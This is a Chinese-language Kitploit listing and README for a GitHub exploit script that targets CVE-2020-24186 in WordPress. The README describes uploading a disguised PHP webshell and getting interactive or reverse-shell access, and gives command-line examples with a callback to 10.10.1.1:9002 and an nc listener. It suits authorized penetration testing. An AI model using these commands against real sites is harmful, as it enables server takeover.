Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2020-24186 — 针对WordPress中CVE-2020-24186的利用脚本,可上传伪装PHP webshell,并提供交互式或反向shell访问,同时具备可选的pwntools监听器自动化功能。 | Kitploit
工具/GitHubGitHub/gazettel/cve-2020-24186
Payload生成漏洞分析漏洞利用ShellcodeWeb应用程序漏洞利用渗透测试远程访问工具
GitHubgazettel/cve-2020-24186

CVE-2020-24186

针对WordPress中CVE-2020-24186的利用脚本,可上传伪装PHP webshell,并提供交互式或反向shell访问,同时具备可选的pwntools监听器自动化功能。

查看仓库
1年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2020-24186

该脚本利用 WordPress 中的 CVE-2020-24186 漏洞,上传伪装后的 PHP 负载并在目标系统上获取 Shell。共有三种操作模式:

  1. 交互式 Shell:
    上传基础 WebShell 并进入交互模式,允许您通过 cmd 参数发送命令。

  2. 手动反弹 Shell:
    上传 WebShell 并发送反弹 Shell 负载,但 不会 自动启动监听器。您需要在指定的 IP 和端口上手动启动自己的监听器。

  3. 使用 pwntools 反弹 Shell:
    上传 WebShell,发送反弹 Shell 负载,脚本会自动使用 pwntools 启动监听器以捕获反弹连接。

要求

  • Python 3.x
  • Python 库:
    • requests
    • pwn (pwntools)
  • (可选)如需路由流量(例如使用 Burp Suite 测试),可配置代理。

使用选项

  • --url:目标站点的基础 URL(例如 http://10.10.110.119)。
  • --blogpath:文章的路径(默认值:/?page=1)。
  • --mode:操作模式,可选 interactive 或 reverse。
  • --lhost:反弹 Shell 的本地 IP(反弹模式必需)。
  • --lport:反弹 Shell 的本地端口(反弹模式必需)。
  • --reverse_method:反弹 Shell 方法:bash、nc 或 python(默认 bash)。
  • --manual:在反弹模式下使用,脚本 不会 启动监听器,您必须手动启动自己的监听器。
  • --use-proxy:若设置,请求将通过配置的代理发送。

示例

1. 交互式 Shell

上传 WebShell 并启动交互式会话以发送命令:

root@kitploit:~
python3 CVE-2020-24186.py --url http://10.10.110.119 --blogpath "/?page=1" --mode interactive --use-proxy

2. 手动模式的反弹 Shell

上传 WebShell,发送反弹 Shell 负载,但不会自动启动监听器。手动启动自己的监听器(例如使用 netcat):

root@kitploit:~
python3 CVE-2020-24186.py --url http://10.10.110.119 --blogpath "/?page=1" --mode reverse --lhost 10.10.1.1 --lport 9002 --reverse_method bash --manual --use-proxy

然后,在另一个终端中手动启动监听器:

root@kitploit:~
nc -lvnp 9002

1. 使用 pwntools 的反弹 Shell

上传 WebShell,发送反弹 Shell 负载,脚本自动使用 pwntools 启动监听器以捕获连接:

root@kitploit:~
python3 CVE-2020-24186.py --url http://10.10.110.119 --blogpath "/?page=1" --mode reverse --lhost 10.10.1.1 --lport 9002 --reverse_method bash --use-proxy

脚本将在 10.10.1.1:9002 上等待连接,连接成功后提供一个交互式 Shell。

注意事项

  • 确保目标站点存在 CVE-2020-24186 漏洞,并且您拥有安全测试所需权限。
  • 如需调整 PHP 负载,可使用 --php_payload 选项进行修改。
  • 使用 --use-proxy 标志时,请仔细检查代理设置。
下载工具